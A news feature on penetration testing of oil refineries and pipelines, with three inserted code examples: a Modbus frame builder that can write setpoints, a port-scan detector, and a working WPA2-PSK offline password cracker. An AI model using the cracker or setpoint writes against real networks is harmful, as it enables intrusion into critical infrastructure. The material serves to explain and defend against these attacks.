A ship navigates through Buffalo Bayou heading to a dock along the Houston Ship Channel in La Porte.
The computer hacker crouched low in thick brush on a cold December night, just beyond the fence line of his target — a massive U.S. oil refinery.
Wearing night-vision goggles and dressed in black, he swung a rubber mallet into the dirt, trying to produce vibrations to distract the plant’s ground-penetrating radar system. He swung again and again. Flashlights emerged from a distant building, then disappeared.
Soon a train roared by, providing the cover his team needed. Quickly, two more men appeared from the shadows. They threw a wool blanket over a 16-foot barbed wire fence, climbed over and rushed to a small building housing the facility’s vital computer controls.
The door had an electronic lock, a badge reader and a plate to thwart lock picking. But the intruders caught a break. The door didn’t sit properly in its frame, leaving just enough space to shimmy it open.
Within moments, they had planted a small device, about the size of a credit card, designed to begin penetrating the refinery’s control systems.
“Bingo!” crackled from the radio inside a white SUV adorned with a phony logo of the refining company, some 200 yards away. From there, Jeremiah Talamantes gave the signal to leave — “Rabbit!”
As the other hackers hopped into the SUV, the driver’s nerves calmed. Then a stark reality set in.
“We’ve used a couple hundred dollars in gear, and we were able to break into a refinery without anyone knowing,” said Talamantes, president and managing partner of RedTeam Security in Minnesota. “The implication is pretty devastating.”
Talamantes was hired by the refinery to test its defenses against cyberattacks and, like so many others, the mission was way too easy. Despite the refinery’s remote location, fencing, high-tech sensors and security team, his team was able to infiltrate its network and potentially wreak havoc.
In recent years, a growing cottage industry of boutique security companies has emerged as oil and gas companies seek outside help to protect their networks. In test after test, private specialists reveal what federal authorities say is a growing national security threat — control systems for valves, pumps, pipelines and refineries are among the most vulnerable targets to cyberattacks.
Often, security firms find that drillers, refiners and pipeline operators run facilities with outdated software and aging automated devices without built-in security. Some companies lack internal detection systems that would allow them to spot cyber intruders.
“We almost always get in,” said Jason Larsen, who leads a team at security firm IOActive that has operations in more than 30 countries. “Most of the time we’re not detected.”
Many energy companies are turning to security specialists to determine whether protocols and defensive software can withstand the creativity and determination of global hackers, said Larry Dannemiller, a cyber insurance broker for major U.S. insurance firms.
“Are all the dollars they’re spending actually making them more secure?” he said. “You have to test it.”
Talamantes shared a detailed account of his firm’s efforts to penetrate the refinery in December, so long as the company’s name wasn’t published. Executives were stunned by the intrusion, he said, believing a successful break-in would have taken a much larger team with more time, resources and expensive gear.
“We proved them wrong,” Talamantes said bluntly.
From the mines of Chile to offshore platforms in the Indian Ocean to refineries in the United States, Jim Guinn has hacked just about every kind of energy facility.
“There’s not a refinery, power generation facility, oil terminal or platform that doesn’t have technology on it that we haven’t been able to infiltrate,” said Guinn, global head of energy security at Accenture consulting in Houston.
This grim assessment comes in spite of the industry’s hard-won progress in cybersecurity over the past few years. Before 2010, energy executives largely ignored the threat such attacks posed to their operations, said Gary Leibowitz, a board member of the Houston chapter of InfraGard, a group that works on cybersecurity issues with the FBI and private companies.
That year, the Stuxnet worm damaged roughly a thousand centrifuges at Iran’s Natanz uranium enrichment plant, demonstrating that malicious code could cause physical destruction in the real world. Since then, many oil companies have made progress in hardening firewalls, bolstering anti-virus software and other defenses, and improving cybersecurity practices.
“Companies are spending time and money on cybersecurity, and it’s across the board,” Leibowitz said.
Exxon Mobil, for example, bans its employees from using personal email and USB flash drives that can carry computer viruses and regularly sends simulated phishing emails to test whether workers will click on alluring links or open attachments, executives said at industry conferences. The company, like many other oil and gas companies contacted for this story, declined comment.
The oil and gas industry, however, remains at a disadvantage against sophisticated hackers, cybersecurity specialists said. The sheer size of the industry alone makes it difficult to secure thousands of devices in vast networks of pipelines, refineries and other facilities stretching across the continent.
In contrast, hackers have to look for only a small number of security flaws to exploit these systems, said Philip Quade, who recently retired as chief of the National Security Agency’s cyber task force.
“Just about anything,” he said, “can be penetrated by someone sophisticated and determined.”
Open to the public
In many cases, the resourceful hacker doesn’t need to develop new malware to get access to industrial controls — a simple internet search can do the trick.
A few years ago, Eireann Leverett, a cybersecurity researcher in the United Kingdom, used Shodan, a public search engine that indexes internet-connected devices, to find more than 7,500 industrial devices reachable from the internet. Fewer than 1 in 5 required any kind of authentication, such as a password, before granting access.
Among the devices hackers have attacked through the internet are the lightweight sensors that run along thousands of miles of pipeline across the nation. “We should be worried,” Leverett said.
Compromising a sensor on a pipeline could allow a hacker to alter readings of how much oil and gas is running through the pipeline, which could cause the systems to begin pumping more hydrocarbons, said Alvaro Cardenas, an assistant professor and cybersecurity expert at the University of Texas at Dallas.
“It might cause a pressure blast,” Cardenas said.
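The exposure Leverett measured and the register tampering Cardenas describes come down to the same protocol fact: the most common industrial field protocol, Modbus/TCP, has no credential field anywhere in its frame, so a device that answers on TCP port 502 answers anyone. The following is an added example, not code from the article or from any of the firms quoted in it; it assumes the exposed devices speak Modbus/TCP (the article does not name the protocol), and the sample replies, register values and unit id are constructed for illustration.

```python
import struct

# Modbus/TCP frame = 7-byte MBAP header + PDU. Neither part carries a credential:
# any host that can reach TCP/502 on the device can issue reads and writes.
MBAP = struct.Struct(">HHHB")  # transaction id, protocol id (always 0), length, unit id

def build_read_holding(tid: int, unit: int, start: int, count: int) -> bytes:
    """Function 0x03: read `count` holding registers beginning at `start`."""
    pdu = struct.pack(">BHH", 0x03, start, count)
    return MBAP.pack(tid, 0, len(pdu) + 1, unit) + pdu   # +1 covers the unit id byte

def build_write_single(tid: int, unit: int, addr: int, value: int) -> bytes:
    """Function 0x06: write one holding register, e.g. a flow or pressure setpoint."""
    pdu = struct.pack(">BHH", 0x06, addr, value)
    return MBAP.pack(tid, 0, len(pdu) + 1, unit) + pdu

def parse_response(frame: bytes) -> dict:
    """Decode a device reply; raises on a malformed header or an unhandled function."""
    tid, proto, length, unit = MBAP.unpack_from(frame, 0)
    if proto != 0 or length != len(frame) - 6:
        raise ValueError("malformed MBAP header")
    func, body = frame[7], frame[8:]
    if func & 0x80:                       # exception response: function | 0x80, then a code
        return {"tid": tid, "unit": unit, "function": func & 0x7F, "exception": body[0]}
    if func == 0x03:
        n = body[0]                       # byte count, two bytes per register
        regs = list(struct.unpack(f">{n // 2}H", body[1:1 + n]))
        return {"tid": tid, "unit": unit, "function": func, "registers": regs}
    if func == 0x06:                      # the device echoes the address and value it accepted
        addr, value = struct.unpack(">HH", body[:4])
        return {"tid": tid, "unit": unit, "function": func, "address": addr, "value": value}
    raise ValueError(f"unhandled function 0x{func:02x}")

# Constructed replies (not captured from any real device): a read of two registers
# returning 1200 and 0, an accepted write of 1500 to register 0, and an exception
# (code 2, illegal data address) for a read outside the device's register map.
SAMPLE_READ_RESPONSE  = bytes.fromhex("0001 0000 0007 01 03 04 04b0 0000")
SAMPLE_WRITE_RESPONSE = bytes.fromhex("0002 0000 0006 01 06 0000 05dc")
SAMPLE_EXCEPTION      = bytes.fromhex("0003 0000 0003 01 83 02")

if __name__ == "__main__":
    print(build_read_holding(1, 1, 0, 2).hex())       # what a scanner sends, with no login first
    print(parse_response(SAMPLE_READ_RESPONSE))
    print(build_write_single(2, 1, 0, 1500).hex())    # what an attacker sends to change a setpoint
    print(parse_response(SAMPLE_WRITE_RESPONSE))
    print(parse_response(SAMPLE_EXCEPTION))
```

The write request is byte-for-byte what a legitimate HMI would send; nothing in the frame lets the device tell the two apart. That is why the practical controls are network ones: keep port 502 off any routable network, allow only the engineering and HMI hosts through the firewall in front of the device, and alert on any other source that so much as completes a TCP handshake to it.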
A few years ago, hackers succeeded in hijacking the modems attached to remote sensors owned by two North American pipeline and utilities companies, after finding them on a public search engine, said Guinn, one of the cybersecurity consultants that investigated the incident.
A power outage had caused the sensors to reset — effectively, turn off — their security settings, leaving them vulnerable to attack from the internet. In this case, the hackers used these devices to launch cyberattacks against other groups. If they had more nefarious ends, they could have crippled the pipelines, Guinn said.
“It’s possible to demonstrate catastrophic disruption in energy company assets,” he said. “We know it can be done.”
Beyond the internet, industrial controls, sensors and other devices with wireless capabilities or radio transmitters are open to attack by hackers using long-range antennas.
In fact, an off-the-shelf drone attached with a wireless receiver could fly within range of a facility and intercept its wireless signals, according to cybersecurity specialists.
Jeff Melrose, principal security manager at industrial control vendor Yokogawa, piloted three white drones simultaneously over a parking lot in Stafford, demonstrating their maneuverability and their potential for extending a hacker’s reach to capture wireless signals.
“Drones are coming into their own, and the things people can do with them will only increase,” said Melrose, noting that energy companies have reported drones buzzing by facilities or crashed with dead batteries nearby.
Security personnel at energy companies are more used to dealing with activists handcuffing themselves to valves, Melrose added. They rarely look up to see the threat from above.
“The question is,” he said, “are you thinking about the deviousness of your adversary?”
The Department of Homeland Security said network scanning and probing accounted for 79 cyber incidents involving industrial controls in 2014 and 2015, but it would not disclose additional details, citing security concerns.
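Scanning and probing is the most visible stage of an intrusion, and it is the stage the firms quoted above say usually goes unnoticed. The following is an added example, not code from the article or from DHS; it shows the kind of detection a plant network could run over its own perimeter firewall logs: flag any source that touches many distinct ports on one host within a short window, and raise the severity when the ports hit are industrial protocol ports. The log format, hosts, timestamps and thresholds are constructed for illustration; the port-to-protocol mapping is standard (102 S7comm, 502 Modbus/TCP, 20000 DNP3, 44818 EtherNet/IP).

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Well-known industrial protocol ports; a scan that touches these deserves a higher severity.
ICS_PORTS = {102: "S7comm/ISO-TSAP", 502: "Modbus/TCP", 20000: "DNP3", 44818: "EtherNet/IP"}

# Generic firewall-log shape (assumed for this example; adjust the regex for your device).
LINE_RE = re.compile(r"^(?P<ts>\S+) \S+ SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=\S+ DPT=(?P<dpt>\d+)")

def parse_line(line: str):
    m = LINE_RE.match(line)
    if not m:
        return None                       # unparseable lines are skipped, not fatal
    return datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dpt"])

def detect_scans(lines, window=timedelta(seconds=60), threshold=10):
    """Flag any (src, dst) pair that touches >= `threshold` distinct ports within `window`."""
    events = sorted(e for e in map(parse_line, lines) if e)
    recent = defaultdict(deque)           # (src, dst) -> (timestamp, port) seen within the window
    alerts = {}
    for ts, src, dst, port in events:
        q = recent[(src, dst)]
        q.append((ts, port))
        while ts - q[0][0] > window:      # drop events that have aged out of the window
            q.popleft()
        ports = {p for _, p in q}
        if len(ports) >= threshold:
            a = alerts.setdefault((src, dst), {"first": q[0][0], "last": ts, "ports": set()})
            a["last"] = ts
            a["ports"] |= ports
    for a in alerts.values():             # finalize: sorted port list plus the ICS subset
        a["ports"] = sorted(a["ports"])
        a["ics_ports"] = [p for p in a["ports"] if p in ICS_PORTS]
    return alerts

# Constructed sample (no real hosts): 10.8.4.21 sweeps 12 ports on a PLC gateway in six
# seconds; 10.20.1.9 is the HMI polling Modbus every five minutes, which must not alert.
SAMPLE_LOG = """\
2015-12-03T02:10:00 ACCEPT SRC=10.20.1.9 DST=10.20.1.5 PROTO=TCP DPT=502
2015-12-03T02:14:01 DROP SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=21
2015-12-03T02:14:01 DROP SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=22
2015-12-03T02:14:02 DROP SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=23
2015-12-03T02:14:02 DROP SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=80
2015-12-03T02:14:03 ACCEPT SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=102
2015-12-03T02:14:03 DROP SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=443
2015-12-03T02:14:04 ACCEPT SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=502
2015-12-03T02:14:04 DROP SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=1433
2015-12-03T02:14:05 DROP SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=3389
2015-12-03T02:14:05 DROP SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=8080
2015-12-03T02:14:06 ACCEPT SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=20000
2015-12-03T02:14:06 ACCEPT SRC=10.8.4.21 DST=10.20.1.5 PROTO=TCP DPT=44818
2015-12-03T02:15:00 ACCEPT SRC=10.20.1.9 DST=10.20.1.5 PROTO=TCP DPT=502
garbage line the parser should ignore
2015-12-03T02:20:00 ACCEPT SRC=10.20.1.9 DST=10.20.1.5 PROTO=TCP DPT=502
"""

if __name__ == "__main__":
    for (src, dst), a in detect_scans(SAMPLE_LOG.splitlines()).items():
        print(f"scan {src} -> {dst}: {len(a['ports'])} ports, ICS ports hit: {a['ics_ports']}")
```

The HMI's steady polling of a single port never crosses the threshold, while the sweep does, and the ACCEPT lines on 102, 502, 20000 and 44818 tell the responder that the probe reached live industrial services rather than bouncing off closed ports. On a real plant network the same logic belongs in the SIEM fed by the firewall between the corporate and control zones, since that boundary is where a scan from a compromised office laptop first shows up.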
Many companies have adopted stronger encryption. Still, the most common security setting for wireless networks in energy and other industrial facilities remains WPA2 with a shared password (WPA2-PSK), the same mode used on household wireless networks.
Skilled hackers could break into them in about two hours, said Kevin Dunn, senior vice president at the Austin offices of NCC Group, a security firm based in the United Kingdom.
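The reason a shared password is the weak point is that WPA2-PSK lets an attacker take the attack offline: once the four-way handshake between a client and the access point has been captured over the air, every candidate password can be checked against it on the attacker's own hardware, with no further contact with the network. The following is an added example, not code from the article or from NCC Group; it implements the standard key derivation (PBKDF2 from passphrase and SSID, the 802.11i PRF for the pairwise key, and the HMAC-SHA1 message integrity code over the second handshake message) and runs a small wordlist against a handshake. The handshake itself is simulated here, with fixed MAC addresses, nonces, a stand-in EAPOL frame and a constructed wordlist, since there is no radio to capture from; everything else is the real algorithm.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i; the first 128 bits of the PTK are the KCK that keys the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )[:64]
    return ptk[:16]

def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2 with AES-CCMP: MIC = HMAC-SHA1(KCK, EAPOL frame with its MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]

@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes      # message 2 of the four-way handshake, MIC field already zeroed
    mic: bytes        # the MIC as it appeared on the air

def crack(hs: Handshake, wordlist) -> Optional[str]:
    """Offline guess: recompute the MIC for each candidate and compare with the captured one."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs.ssid)
        kck = derive_kck(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic):
            return candidate
    return None

# Constructed stand-in for a sniffed handshake (fixed MACs and nonces; a real EAPOL frame
# carries the SNonce and RSN IE, but only its bytes matter to the MIC). The MIC is computed
# here with the true passphrase, exactly as the joining client would have computed it.
AP_MAC, STA_MAC = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
EAPOL_MSG2 = b"\x01\x03\x00\x75\x02\x01\x0a" + bytes(114)

def simulated_capture(ssid: str, true_passphrase: str) -> Handshake:
    kck = derive_kck(pmk_from_passphrase(true_passphrase, ssid), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return Handshake(ssid, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, eapol_mic(kck, EAPOL_MSG2))

# Constructed wordlist; real attacks use lists of millions of leaked and site-specific passwords.
WORDLIST = ["password", "admin123", "welcome1", "refinery", "refinery2015", "Plant1234", "changeme"]

if __name__ == "__main__":
    print(crack(simulated_capture("PlantWiFi", "refinery2015"), WORDLIST))          # recovered
    print(crack(simulated_capture("PlantWiFi", "q7#Gm!x9Lp2$vR4nZt8w"), WORDLIST))  # None
```

Two things follow from the code. First, the only per-guess cost is the PBKDF2 step, which is fixed by the standard at 4096 iterations and runs in parallel on GPUs, so the attacker's time is set by the size of the password space and nothing the defender does after the capture. Second, the SSID is the salt, so a site-specific passphrase on a site-named network is guessed by a site-specific wordlist. The corrected configuration for a plant is WPA2-Enterprise (802.1X with per-device certificates), which has no shared passphrase to recover at all; where a PSK cannot be avoided, it needs to be long and random, and the wireless network must in any case sit outside the control network rather than bridged into it.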
“If this were a targeted attack,” Dunn said, “whether it be ‘hactivism’ or a nation-state, all they need is time and money and opportunity.”
Simple mistakes by workers can lead to devastating consequences.
Two years ago, Steve Mustard, a cybersecurity specialist for the nonprofit group Automation Federation, was delivering a lecture at a Western oil company’s office in Tunisia when the event came to an abrupt halt. The company’s anti-virus program had detected the destructive Stuxnet worm.
IT workers rushed to phones and computers, discovering that an employee had accidentally introduced the malware by plugging an infected thumb drive into his computer. They quickly tracked it down and contained it.
Had the employee plugged that drive into a computer at a nearby oil production facility, chances are the company would never have caught the virus. It had no detection systems in place for the computer network controlling operations, Mustard said.
“Spills, potential worker injuries, explosions, fires — all of those things could happen,” Mustard said. “What you’ve got are very vulnerable systems that aren’t managed very well, and on the other side, an exponentially increasing number of threats.”
As Talamantes’ refinery caper shows, hackers don’t have to limit themselves to the internet to break into computer networks.
With long-range cameras, they can spend days watching workers entering front doors, so they can mimic their behavior and exploit weak spots to get inside, Talamantes said.
Before Talamantes and his team raided the oil refinery in December, they staked out the company’s corporate offices. They watched employees at nearby coffee shops and restaurants, managing to steal and clone badges.
Talamantes said he tries to stay within the bounds of what real hackers can do with a modest investment. In the refinery raid, his team carried only a small amount of gear, including a laptop, lock-pick set and a $35 device to tap the computer systems, all available on Amazon.
They also used two 16-foot ladders, which they later returned to Home Depot for a full refund, and a set of four two-way radios. Over the course of his career, Talamantes said, such tests have found plenty of security weaknesses, cyber and otherwise, that should worry the energy industry.
But the scariest part, he said, is that so much of hacking is low-tech, requiring little expertise.
“Anyone can do these types of things.”